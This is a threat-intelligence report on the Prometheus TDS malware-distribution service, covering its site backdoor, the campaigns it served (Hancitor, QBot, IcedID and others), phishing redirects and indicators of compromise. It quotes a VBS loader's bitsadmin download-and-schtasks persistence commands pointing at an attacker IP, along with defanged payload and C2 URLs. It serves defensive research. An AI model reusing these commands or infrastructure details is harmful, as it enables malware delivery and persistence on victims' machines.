Prometheus TDS

Introduction

In the spring of 2021, Group-IB’s Threat Intelligence analysts discovered traces of a malware campaign distributing Hancitor. The researchers took an interest in an untypical pattern of the downloader’s distribution, which was subsequently described by Unit 42 and McAfee researchers as a new technique designed to hide documents containing malicious links from web scanners’ radars. However, the data extracted by Group-IB’s analysts indicates that a similar pattern is also used to distribute malware such as Campo Loader, IcedID, QBot, SocGholish, and Buer Loader.

Group-IB discovered at least 3,000 targets of separate malware campaigns that make use of the same scheme. By analyzing the list of targets, the experts were able to establish the two most active campaigns. The first targeted individuals in Belgium, and the second targeted companies, corporations, universities, and government organizations in the United States.

By analyzing the malware distribution campaigns, Group-IB’s experts were able to conclude that it was possible for them to be carried out using the same MaaS solution. This assumption was later confirmed by Group-IB’s analysts after they found a sale notice for a service designed to distribute malicious files and redirect users to phishing and malicious sites — Prometheus TDS (Traffic Direction System) — on one of the underground platforms.

Description

Prometheus TDS is an underground service that distributes malicious files and redirects visitors to phishing and malicious sites. This service is made up of the Prometheus TDS administrative panel, in which an attacker configures the necessary parameters for a malicious campaign: downloading malicious files, and configuring restrictions on users’ geolocation, browser version, and operating system.

To prevent victims of malicious campaigns from interacting with the administrative panel directly, which may result in the attacker’s server being disclosed and blocked, Prometheus TDS uses third-party infected websites that act as a middleman between the attacker’s administrative panel and the user. It should also be mentioned that the list of compromised websites is manually added by the malware campaign’s operators. The list is uploaded through importing links to web shells. A special PHP file named Prometheus.Backdoor is uploaded to the compromised websites to collect and send back data about the user interacting with the administrative panel. After analyzing the data collected, the administrative panel decides whether to send the payload to the user and/or to redirect them to the specified URL.

More than three thousand email addresses targeted in the first phase of malicious campaigns in which Prometheus TDS was used to send malicious emails were extracted by Group-IB Threat Intelligence analysts. The extracted data analysis helped identify the most active campaigns, one targeting individuals in Belgium (more than 2,000 emails) and the other targeting US government agencies, companies, and corporations in various sectors (banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance), (more than 260 emails). The data about identified targets of attacks with the use of Prometheus TDS and companies affected as their result has been handed over to the US, German and Belgian CERTs.

Targets of malicious campaigns with the use of Prometheus TDS

Attack scheme using Prometheus TDS

The distribution of malware using Prometheus TDS is carried out in several stages.

Stage 1

The user receives an email containing one of the following elements:

• An HTML file that redirects the user to a compromised site on which Prometheus.Backdoor is installed;
• A link to a web shell that redirects users to a specified URL, in this case to one of the addresses used by Prometheus TDS;
• A link to a Google Doc containing the URL redirecting users to a malicious link.

The implementation of malicious campaigns with the use of Prometheus TDS

Google Docs files used by Prometheus TDS

Stage 2

The user opens the attachment or follows the link and is redirected to the Prometheus.Backdoor URL. Prometheus.Backdoor collects the available data on the user.

Stage 3

The data collected is sent to the Prometheus TDS admin panel. This admin panel then decides whether to instruct the backdoor to send a malicious file to the users and/or to redirect them to the specified URL.

Analysis of Prometheus.Backdoor

Malicious campaigns using Prometheus TDS are carried out via hacked sites with Prometheus.Backdoor installed on them. The backdoor is controlled through the admin panel.

Prometheus TDS admin panel

The data exchange between the administrative panel and the backdoor is encrypted with an XOR cipher. The key for this cipher is explicitly hardcoded in the Prometheus.Backdoor settings, along with the address of the administrative panel used by the attackers to manage backdoors on infected sites.

A fragment of the Prometheus.Backdoor code containing the address of the administrative panel, a key for encrypting transmitted data, and functions for encrypting and decrypting data

After the user visits the infected site, Prometheus.Backdoor collects basic information about them: IP address, User-Agent, Referrer header, time zone, and language data, and then forwards this information to the Prometheus admin panel.

Part of the Prometheus.Backdoor code used to collect information about the user’s time zone

Part of the Prometheus.Backdoor code showing the algorithm used to generate a request to the administrative panel for the transfer of visitor data

If the user is not recognized as a bot, then, depending on the configuration, the administrative panel can send a command to redirect the user to the specified URL, or to send a malicious file. The payload file is sent using a special JavaScript code. Most often, the malicious software can be found in weaponized Microsoft Word or Excel documents, however, the attackers also use ZIP and RAR files. In some cases, the user will be redirected to a legitimate site immediately after downloading the file, so it will appear to them like the file was downloaded from a safe source.

Part of the Prometheus.Backdoor code showing a method for serving malicious files

Malware campaigns analysis

Campo Loader

Analyzing the extracted files, Group-IB Threat Intelligence analysts found 18 unique malicious documents relating to the Campo Loader, aka the BazaLoader malware. After downloading the malware, the user is redirected to the DocuSign or USPS sites as a distraction from the malware’s activity.

A screenshot of a decoy document from the “Campo Loader” distribution campaign

Campo Loader spreads through malicious macros in Microsoft Office documents. After the victim activates the macros, the loader saves and then decodes the .dll file, which is executed through certutil. After the dumped .dll file is executed, it sends an HTTP request to its C&C server:

Content of the malicious macros

The server processes the incoming request and, depending on the victim’s geolocation (based on their IP address) decides whether to send the payload or redirect them to Yahoo!, GNU, or other resources. The downloader takes its name from the path of the same name in HTTP requests used to download malicious files during the second stage.

Redirection to gnu.org

If the administrative panel gives the command to send the payload, then the user is redirected to the resource where it is stored or receives it directly from the C&C server.

Results of the request satisfying the server’s requirements to upload a second stage file

Analysis revealed that Campo Loader was used at various times to distribute TrickBot and Ursnif/Gozi bankers, etc.

Campo Loader administrative panel

Hancitor

Monitoring of Prometheus TDS revealed 34 malicious documents relating to the Hancitor malware, which is a downloader trojan.

A screenshot of a decoy document from the Hancitor distribution campaign

After downloading the malicious document, the victim is either redirected to the DocuSign website, or to phishing sites using IDN domains that imitate the sites of two US banks.

A phishing page to which a user was redirected after downloading a malicious Hancitor load located on an IDN domain xn--keynvigatorkey-yp8g[.]com (https://urlscan.io/result/108463b8-7c0d-4644-9d2b-52cbca3426f8/)

One of the files identified (SHA1: 41138f0331c3edb731c9871709cffd01e4ba2d88) was sent in a phishing email containing a link to a Google Doc. The document stored in Google Docs contained the link hXXps://webworks.nepila[.]com/readies.php. When the victim clicks on the link, a request is sent to Prometheus.Backdoor. The server then processes the data collected about the user’s system and decides whether to send the payload or not.

An example of requests to a site containing Prometheus.Backdoor, with successful delivery of a malicious document and subsequent redirection to DocuSign

The screenshot above shows that the response to the first request for the file “readies.php” is 937 bits, while the second one is 424,594 bits. This means that the server approved the victim’s device settings and the second request resulted in the download of the Base64 file “0301_343810790.doc“. After downloading the file, the victim is redirected to Docusign.com.

Part of the Prometheus.Backdoor code showing a malicious file distribution pattern

The saved file “0301_343810790.doc” is a .doc file containing malicious macros. After activating the macros in the document, the DLL file is dropped and executed by path c:\users\%username%\appdata\local\temp\Static.dll, using rundll32.exe. After the file has been executed, the following HTTP requests are sent:

• hxxp://api.ipify[.]org/
• hxxp://ementincied[.]com/8/forum.php
• hxxp://mymooney[.]ru/6fwedzs3w3fg.exe

The downloaded file “6fwedzs3w3fg.exe” (SHA1: 7394632d8cfc00c35570d219e49de63076294b6b ) is a sample of Ficker Stealer

In April 2021, Unit 42 researchers partially analyzed this campaign. The experts also mention the Ficker Stealer, Cobalt Strike, and Send-Safe spambots in their research.

QBot

The following documents were found among the files used to distribute the banking trojan QBot.

These documents are lure files that require macro activation when launched. As soon as the macros are activated, an HTTP request is sent to download the DLL file with the payload.

Decoy document from the QBot distribution campaign

The malicious document discovered was sending requests to the following URL addresses:

• https://inpulsion[.]net/ds/0702.gif
• https://aramiglobal[.]com/ds/0502.gif

Unfortunately, at the time of analysis, these files were no longer available. However, our data suggests that QBot is loaded via these paths.

IcedID

One of the malicious documents sent using Prometheus TDS distributed the banking Trojan IcedID, aka Bokbot.

A screenshot of a decoy document from the IcedID malware distribution campaign

After opening the document and running the macros, the office file attempted to download and run the DLL file at hXXp://denazao[.]info/images/1j.djvu. The file was not available at the time of analysis. A similar office document was found on VirusTotal; it also downloaded the payload from hXXp://denazao[.]info/images/1j.djvu. After launching the payload, the request was sent to the IcedID C&C server located at hXXp://twotimercvac[.]uno/.

Graph representing the IcedID C2 environment

VBS Loader

During the analysis, the specialists found three samples of an unidentified VBS loader. After downloading these files, the user is redirected to the USPS website. When the user clicks on a malicious link, Prometheus TDS asks the user to download a ZIP archive containing a VBS script. After the script is launched, the payload is downloaded in the form of another VBS script using bitsadmin. The downloaded file is launched using the Windows Task Scheduler by creating a command that runs the VBS script every 30 minutes starting at 00:00.

Part of the obfuscated VBS loader containing the URL for the payload download

To download and run the payload, the VBS script executes a set of special commands using bitsadmin and schtasks:

• cmd /k exit | exit & bitsadmin /create EncodingFirm & exit
• cmd /k exit | exit & bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp & exit
• cmd /k exit | exit & bitsadmin /resume EncodingFirm & exit
• cmd /k exit | exit & schtasks /create /sc minute /mo 30 /tn “Task Update ButPrinciple” /f /st 00:00 /tr C:\Users\<User>\AppData\Local\ButPrinciple\ButPrinciple.vbs & exit
• cmd /k exit | exit & bitsadmin /complete EncodingFirm & exit
• cmd /k exit | exit & bitsadmin /reset & exit

At the time of analysis, there was only one similar VBS loader sample on VirusTotal, which was detectable by only one antivirus solution.

Antivirus detection for file fcd8674f8df4390d90dad6c31a3dd6f33d6a74de

Buer Loader

Within the campaign, the file “document010498(1).zip” was also distributed. It contained the file “document010498.jnlp“, which downloads the payload from the domain “secure-doc-viewer[.]com“.

Unfortunately, at the time of analysis, the domain was not active. Based on the contents of the file, it seems reasonable to assume that it is a decoy document used to download files relating to the second stage.

Contents of the file document010498.jnlp

An analysis of the domain “secure-doc-viewer[.]com” by the experts using Group-IB’s graph revealed that the owner’s name, as indicated in the WHOIS records of the domain, is “artem v gushin.” The analysis also showed that this name is connected to more than 50 domains.

Part of the connections of the domain secure-doc-viewer[.]com according to WHOIS records

Among the related domains, researchers identified several of them using the same keywords:

• pdfsecure[.]net
• securepdfviewer[.]com
• invoicesecure[.]net

The domains are also related to .jnlp files, for example, “invoice.jnlp” (SHA1: e3249b46e76b3d94b46d45a38e175ef80b7d0526).

Content of the invoice.jnlp

Several studies indicate that the above domains are part of the Buer Loader distribution campaign.

SocGholish

The analysis of the URLs of the compromised sites used in the Prometheus TDS infrastructure revealed that some of them redirect the user to the home page of the compromised website.

Prometheus.Backdoor URL that redirects the visitor to the home page of the compromised site

Through research, it was discovered that these sites are used to distribute the SocGholish malware under the guise of Google Chrome browser updates.

Loading a landing page with fake Google Chrome browser updates

At the same time, SocGholish uses a malicious file distribution pattern very similar to the script used by Prometheus TDS. When the user visits an infected site, they see a page with JavaScript code that contains a Base64 encoded ZIP archive with a malicious file that will be downloaded if the user clicks on the “Update browser” button.

Part of the SocGholish landing page

To the user, this page appears to be offering browser updates.

Screenshot of the fake page offering a Chrome browser update

Fake VPN

In addition to distributing malicious files, Prometheus TDS is also used as a classic TDS to redirect users to specific sites. One of these sites is the fake site of a well-known VPN provider located at hXXps://huvpn[.]com/free-vpn/. Clicking the download button initiates the download of a malicious EXE file from hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).

A screenshot of a fake Windscribe download page

Viagra SPAM

Prometheus TDS also redirected users to sites selling pharmaceutical products. Operators of such sites often have affiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns in order to increase the earnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that redirect users to sites relating to a Canadian pharmacy.

The use of Prometheus TDS for spam emails to redirect users to particular websites

Banking phishing

Prometheus TDS was also used to redirect users to banking phishing sites. For example, during a campaign active from March to May 2021, users who followed the link to Prometheus.Backdoor were redirected to fake sites that mimicked the site of a German bank.

Example of a phishing page used in the campaign involving Prometheus TDS https://urlscan.io/result/69c84104-f272-4c88-970f-a3131c0580ad/

Offers to buy Prometheus TDS on underground forums

The analysis presented above describes several unrelated campaigns carried out by different hacker groups using Prometheus TDS. Working based on the assumption that Prometheus TDS is a MaaS solution, Group-IB researchers analyzed various underground forums in search of relevant offers and found a topic started by a user with the username Main.

Prometheus TDS

Group-IB Threat Intelligence system discovered that the post offering Prometheus for sale was created in August 2020. The owner of the service claimed that Prometheus TDS is an ANTIBOT redirect system designed to send out emails, work with traffic, and for social engineering. In addition, Prometheus TDS can validate web shells, create and configure redirects, operate via proxy, and work with Google accounts, etc. Moreover, the system is able to validate users based on a blacklist, which makes it possible for malicious links to avoid being added to antivirus and spam databases.

Prometheus has two standard modes:

1. Redirecting users to a target page;
2. Issuing files for download (DOC, PDF, JS, VBS, EXE).

The cost of the system is $250 per month. Screenshots from Prometheus TDS admin level provided by Main can be found below:

BRChecker

When examining and monitoring the infrastructure used to host the Prometheus TDS administrative panels, Group-IB experts discovered that some of the servers on which the Prometheus TDS admin panel was previously located now host another unknown panel.

The following is a list of addresses at which different panels were located at different times:

• 188.130.138[.]63;
• 188.130.138[.]22;
• 188.130.138[.]236;
• 188.130.138[.]61;
• 185.186.142[.]32.

Based on the contents of this admin panel’s JS scripts, Group-IB experts assumed that it is a panel from another solution called BRChecker.

Listing of scripts from BRCheker admin panel

An offer to sell the BRChecker system presented as an email address bruter\checker was for the first time posted by the user with the username Mainin mid-June 2018. According to the developer’s description, the system works via modules (workers), installed on rented VPS servers, and controlled through a single admin panel for subsequent brute-forcing or verification of login/password bindings.

Screenshot of a sale announcement for BRCheker

As of May 2021, the cost of the system was $490. Screenshots of BRChecker admin panel provided by Main can be found below:

Screenshot of the BRChecker admin panel

The contents of the screenshots in the for-sale notice made it possible to verify that the unknown panel detected before is indeed related to BRChecker.

Indicators

Prometheus.Backdoor JavaScript

Prometheus TDS Admin

109.248.11.132
109.248.11.204
109.248.11.67
109.248.203.10
109.248.203.112
109.248.203.168
109.248.203.198
109.248.203.202
109.248.203.207
109.248.203.23
109.248.203.33
185.158.114.121
185.186.142.191
185.186.142.32
185.186.142.59
185.186.142.67
185.186.142.77
188.130.138.130
188.130.138.22
188.130.138.236
188.130.138.57
188.130.138.61
188.130.138.63
188.130.138.70
188.130.139.103
188.130.139.203
188.130.139.228
188.130.139.5
188.130.139.88
46.8.210.13
46.8.210.30
51.15.27.25
62.138.0.68

Campo Loader

Hancitor

Qbot

IcedID

VBS Loader

Buer Loader

SocGholish

Fake VPN

Pharma spam

• hotaiddeal.su
• yourmedsquality.su
• goodherbwebmart.com
• ella.purecaremarket.su

Phishing websites

• banking.sparkasse.de-id1897ajje9021ucn9021345345b0juah10zb1092uhda.xyz
• banking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz
• banking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz
• banking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz
• banking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz
• banking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz
• banking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz

Other samples

BRChecker Admin panel

109.248.11.85
109.248.203.202
109.248.203.50
185.186.142.32
185.212.131.44
188.130.138.16
188.130.138.22
188.130.138.236
188.130.138.61
188.130.138.63
188.130.139.107
188.130.139.158
195.62.53.109